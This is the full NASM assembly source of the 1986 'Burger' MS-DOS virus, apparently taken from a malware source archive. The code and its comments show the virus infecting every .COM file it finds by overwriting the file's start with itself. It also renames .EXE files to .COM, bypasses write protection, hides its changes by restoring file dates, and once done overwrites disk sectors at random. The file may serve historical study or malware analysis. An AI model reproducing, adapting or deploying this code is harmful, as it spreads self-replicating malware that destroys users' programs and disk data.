MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.burger.asm
2021-01-12 17:34:47 -06:00

341 lines
9.3 KiB
NASM

; Program Virus Ver.: 1.1
; Copyright by R. Burger 1986
; This is a demonstration program for computer
; viruses. It has the ability to replicate itself,
; and thereby modify other programs
;
; Added A86 v3.22 compatibility 15 Dec 1991
; command line: a86 burger.asm burger.com +D
; Copyright (C) 1991 ==[ CyberZone ]== Jon A Johnson
page 70,120
Name BURGER
code segment
assume cs:code
progr equ 100h
org progr
; The three NOP's serve as the marker byte of the
; virus which allow it to identify a virus.
MAIN:
nop
nop
nop
; Initialize the pointers
mov ax,00
mov es:[pointer],ax
mov es:[counter],ax
mov es:[disks],al
; Get the selected drive
mov ah,19h ; drive?
int 21h
; Get the current path on the current drive
mov cs:drive,al ; save drive
mov ah,47h ; dir?
mov dh,0
add al,1
mov dl,al ; in actual drive
lea si,cs:old_path
int 21h
; Get the number of drives present
; If only one drive is present, the pointer for
; search order will be set to search order + 6
mov ah,0eh ; how many disks
mov dl,0
int 21h
mov al,01
cmp al,01 ; one drive?
jnz hups3
mov al,06
hups3:
mov ah,0
lea bx,search_order
add bx,ax
add bx,0001h
mov cs:pointer,bx
clc
; Carry is set, if no more .COM's are found.
; Then, to avoid unnecessary work, .EXE files will
; be renamed to .COM files and infected.
; This causes the error message "Program too large
; to fit in memory" when starting larger infected
; .EXE programs.
change_disk:
jnc no_name_change
mov ah,17h ; change exe to com
lea dx,cs:maske_exe
int 21h
cmp al,0ffh
jnz no_name_change ; .EXE found?
; If neither .COM nor .EXE is found, then sectors will
; be overwritten depending on the system time in
; milliseconds. This is the time of the complete
; "infection" of a storage medium. The virus can find
; nothing more to infect and starts its destruction.
mov ah,2ch ; read system clock
int 21h
mov bx,cs:pointer
mov al,cs:[bx]
mov bx,dx
mov cx,2
mov dh,0
int 26h ; write crap on disk
; Check if the end of the search order table has been
; reached. If so, end.
no_name_change:
mov bx,cs:pointer
dec bx
mov cs:pointer,bx
mov dl,cs:[bx]
cmp dl,0ffh
jnz hups2
jmp hops
; Get new drive from the search order table and
; select it.
hups2:
mov ah,0eh
int 21h ; change disk
; Start in the root directory
mov ah,3bh ; change path
lea dx,path
int 21h
jmp find_first_file
; Starting from the root, search for the first subdir
; First convert all .EXE files to .COM in the old
; directory.
find_first_subdir:
mov ah,17h ; change exe to com
lea dx,cs:maske_exe
int 21h
mov ah,3bh ; use root dir
lea dx,path
int 21h
mov ah,04eh ; Search for first subdirectory
mov cx,00010001b ; dir mask
lea dx,maske_dir
int 21h
jc change_disk
mov bx,CS:counter
INC BX
DEC bx
jz use_next_subdir
; Search for the next subdir. If no more directories
; are found, the drive will be changed.
find_next_subdir:
mov ah,4fh ; search for next subdir
int 21h
jc change_disk
dec bx
jnz find_next_subdir
; Select found directory.
use_next_subdir:
mov ah,2fh ; get dta address
int 21h
add bx,1ch
mov es:[bx],'\ ' ; address of name in dta
inc bx
push ds
mov ax,es
mov ds,ax
mov dx,bx
mov ah,3bh ; change path
int 21h
pop ds
mov bx,cs:counter
inc bx
mov CS:counter,bx
; Find first .COM file in the current directory.
; If there are none, search the next directory.
find_first_file:
mov ah,04eh ; Search for first
mov cx,00000001b ; mask
lea dx,maske_com
int 21h
jc find_first_subdir
jmp check_if_ill
; If the program is already infected, search for
; the next program.
find_next_file:
mov ah,4fh ; search for next
int 21h
jc find_first_subdir
; Check if already infected by the virus.
check_if_ill:
mov ah,3dh ; open channel
mov al,02h ; read/write
mov dx,9eh ; address of name in dta
int 21h
mov bx,ax ; save channel
mov ah,3fh ; read file
mov cx,buflen
mov dx,buffer ; write in buffer
int 21h
mov ah,3eh ; close file
int 21h
; Here we search for the three NOP's.
; If present, there is already infection. We must
; then continue the search.
mov bx,cs:offset[buffer] ; added A86 compatibility
cmp bx,9090h
jz find_next_file
; Bypass MS-DOS write protection if present
mov ah,43h ; write enable
mov al,0
mov dx,9eh ; address of name in dta
int 21h
mov ah,43h
mov al,01h
and cx,11111110b
int 21h
; Open file for read/write access.
mov ah,3dh ; open channel
mov al,02h ; read/write
mov dx,9eh ; address of name in dta
int 21h
; Read date entry of program and save for future use.
mov bx,ax ; channel
mov ah,57h ; get date
mov al,0
int 21h
push cx ; save date
push dx
; The jump located at address 0100h of the program
; will be saved for future use.
mov dx,cs:[conta] ; save old jmp
mov cs:offset[jmpbuf],dx ; added A86 compatibility
mov dx,cs:[buffer+1] ; save new jump
lea cx,cont-100h
sub dx,cx
mov cs:[conta],dx
; The virus copies itself to the start of the file.
mov ah,40h ; write virus
mov cx,buflen ; length buffer
lea dx,main ; write virus
int 21h
; Enter the old creation date of the file.
mov ah,57h ; write date
mov al,1
pop dx
pop cx ; restore date
int 21h
; Close the file
mov ah,3eh ; close file
int 21h
; Restore the old jump address.
; The virus saves at address "conta" the jump which
; was at the start of the host program.
; This is done to preserve the executability of the
; host program as much as possible.
; After saving it still works with the jump address
; contained in the virus. The jump address in the
; virus differs from the jump address in memory.
mov dx,cs:offset[jmpbuf] ; restore old jmp - A86 compat.
mov cs:[conta],dx
hops:
nop
call use_old
; Continue with the host program.
cont db 0e9h ; make jump
conta dw 0
mov ah,00
int 21h
; Reactivate the selected drive at the start of the
; program.
use_old:
mov ah,0eh ; use old drive
mov dl,cs:drive
int 21h
; Reactivate the selected path at the start of the
; program.
mov ah,3bh ; use old dir
lea dx,old_path-1 ; get old path and backslash
int 21h
ret
search_order db 0ffh,1,0,2,3,0ffh,00,0ffh
pointer dw 0000 ; pointer f. search order
counter dw 0000 ; counter f. nth. search
disks db 0 ; number of disks
maske_com db "*.com",00 ; search for com files
maske_dir db "*",00 ; search for dir's
maske_exe db 0ffh,0,0,0,0,0,00111111b
db 0,"????????exe",0,0,0,0
db 0,"????????com",0
maske_all db 0ffh,0,0,0,0,0,00111111b
db 0,"???????????",0,0,0,0
db 0,"????????com",0
buffer equ 0e000h ; a safe place
buflen equ 230h ; length of virus !!!!!!!
; careful
; if changing !!!!!!!
jmpbuf equ buffer+buflen ; a safe place for jmp
path db "\",0 ; first path
drive db 0 ; actual drive
back_slash db "\"
old_path db 32 dup(?) ; old path
code ends
end main